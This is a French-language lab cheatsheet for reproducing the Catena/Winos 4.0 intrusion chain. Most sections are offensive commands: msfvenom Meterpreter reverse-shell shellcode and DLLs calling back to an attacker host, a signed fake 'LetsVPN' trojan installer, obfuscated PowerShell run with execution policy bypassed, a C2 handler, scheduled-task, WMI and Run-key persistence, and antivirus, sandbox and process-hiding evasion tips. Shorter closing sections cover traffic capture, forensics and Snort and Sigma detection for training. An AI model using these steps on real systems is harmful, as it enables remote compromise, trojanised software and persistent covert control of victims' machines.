🌑 Cheatsheet Catena Sombre 2025 PCtamalou.fr - Catcatcat - Par Platon-Y, Nomade du Code ____ ___ ____ _ _______ ____ / ___|_ _/ ___| |/ / ____| _ \ | | | | | | ' /| _| | | | | | |___ | | |___| . \| |___| |_| | \____|____\____|_|\_\_____|____/ Yo, Apache ! Ce cheatsheet est ton katana pour trancher dans l’attaque Catena/Winos 4.0 dans ton lab sĂ©curisĂ© (10.0.0.0/8, 192.168.0.0/16). Lab only, ou l’article 323-1 CP (7 ans, 100 000 €) te snippera ! 😈 TĂ©lĂ©charge tous les fichiers dans /resources/ et signe le contrat Ă©thique. 1. Config Lab Action Commande IP Kali (attaquant) sudo ip addr add 192.168.1.6/24 dev eth0 IP Windows (cible) New-NetIPAddress -InterfaceAlias "Ethernet" -IPAddress 192.168.1.7 -PrefixLength 24 IP Ubuntu (C2) sudo ip addr add 192.168.1.8/24 dev eth0 VĂ©rifier connectivitĂ© ping 192.168.1.7 (depuis Kali) Astuce Bonus : Pour un lab pro, utilise VLANs (ex. : 10.10.10.0/24) et un switch virtuel. 2. Installateur NSIS Action Commande GĂ©nĂ©rer shellcode msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=4444 -f raw -o /tmp/shellcode.bin Compiler NSIS makensis /tmp/catena.nsi Signer installateur osslsigncode sign -certs cert.pem -key key.pem -n "LetsVPN" -i http://letsVPN.com -in letsVPN.exe -out letsVPN_signed.exe TransfĂ©rer sudo python3 -m http.server 80 (Kali)Invoke-WebRequest -Uri http://192.168.1.6/letsVPN_signed.exe -OutFile letsVPN.exe (Windows) Mini-Challenge Bonus : Change le leurre en faux “QQ Browser”. Modifie Name dans catena.nsi et recompile. 3. Payload PowerShell Action Commande Obfusquer script cd Invoke-Obfuscation; ./Invoke-Obfuscation.ps1 -ScriptPath /tmp/payload.ps1 -OutputFile /tmp/obf_payload.ps1 TransfĂ©rer sudo python3 -m http.server 80 (Kali)Invoke-WebRequest -Uri http://192.168.1.6/obf_payload.ps1 -OutFile obf_payload.ps1 (Windows) ExĂ©cuter powershell -ExecutionPolicy Bypass -File obf_payload.ps1 Astuce Bonus : Ajoute un check pour Kaspersky : $kas = Get-Process | Where-Object { $_.Name -like "*kaspers*"}. 4. Shellcode & DLL Reflective Action Commande GĂ©nĂ©rer DLL msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=4444 -f dll -o /tmp/malicious.dll Compiler loader x86_64-w64-mingw32-gcc /tmp/loader.c -o /tmp/loader.exe Config handler msfconsole -quse exploit/multi/handlerset PAYLOAD windows/x64/meterpreter/reverse_tcpset LHOST 192.168.1.6set LPORT 4444exploit -j TransfĂ©rer Invoke-WebRequest -Uri http://192.168.1.6/malicious.dll -OutFile malicious.dllInvoke-WebRequest -Uri http://192.168.1.6/loader.exe -OutFile loader.exe ExĂ©cuter .\loader.exe Mini-Challenge Bonus : Teste un encodeur : -e x64/xor_dynamic -i 5 dans msfvenom. 5. Serveur C2 Action Commande Lancer C2 python3 /tmp/c2_server.py GĂ©nĂ©rer shellcode C2 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.8 LPORT=18856 -f raw -o /tmp/shellcode_c2.bin Astuce Bonus : Ajoute SSL au C2 : import ssl; ssl.wrap_socket(server). 6. Persistance Action Commande TĂąche programmĂ©e schtasks /create /tn "DarkUpdate" /tr "rundll32.exe %TEMP%\config.ini, #1" /sc daily /st 00:00 /f Persistance WMI wmic /NAMESPACE:\\root\subscription PATH __EventFilter CREATE Name="DarkFilter" ... Mini-Challenge Bonus : CrĂ©e une persistance via registre : reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run. 7. Analyse Action Commande Capturer trafic sudo wireshark -i eth0 -f "tcp port 18856"sudo tcpdump -i eth0 port 18856 -w /tmp/catena.pcap Analyser DLL ghidra (importer malicious.dll) Forensique mĂ©moire volatility -f memdump.vmem --profile=Win10x64 pslist Logs Sysmon `Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" Astuce Bonus : Utilise PEiD pour identifier le packing : peid malicious.dll. 8. DĂ©fenses Action Commande Lancer Snort sudo snort -c /etc/snort/snort.conf -r /tmp/catena.pcap RĂ©activer Defender Set-MpPreference -DisableRealtimeMonitoring $falseRemove-MpPreference -ExclusionPath "C:\" Hardening PowerShell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Restricted -Force Mini-Challenge Bonus : Ajoute une rĂšgle Snort pour dĂ©tecter “Commande reçue” : content:"Commande reçue". 🎁 Bonus : Astuces AvancĂ©es Obfuscation manuelle :$var = 'I'+'nvoke'+'-Mi'+'mikatz' Anti-sandboxing :if (GetTickCount() < 300000) { exit(); } Hook NtQuerySystemInformation :NTSTATUS NTAPI HookedNtQuery(...) { /* Masque processus */ } 🎁 Bonus : Mapping MITRE ATT&CK Technique ID MITRE Commande/Étape ExĂ©cution T1059.001 powershell -File obf_payload.ps1 Persistance T1053.005 schtasks /create Évasion T1027 Invoke-Obfuscation C2 T1071.001 c2_server.py 🎁 Bonus : Challenges Dark Ninja Furtif : Modifie payload.ps1 pour ajouter un check antivirus Trend Micro. MaĂźtre C2 : ImplĂ©mente HTTPS dans c2_server.py avec un certificat auto-signĂ©. DĂ©tective Cyber : CrĂ©e une rĂšgle Sigma pour dĂ©tecter rundll32 suspect. “Dans l’ombre, nous codons. Dans la lumiĂšre, nous protĂ©geons.”— Platon-Y, PCtamalou.fr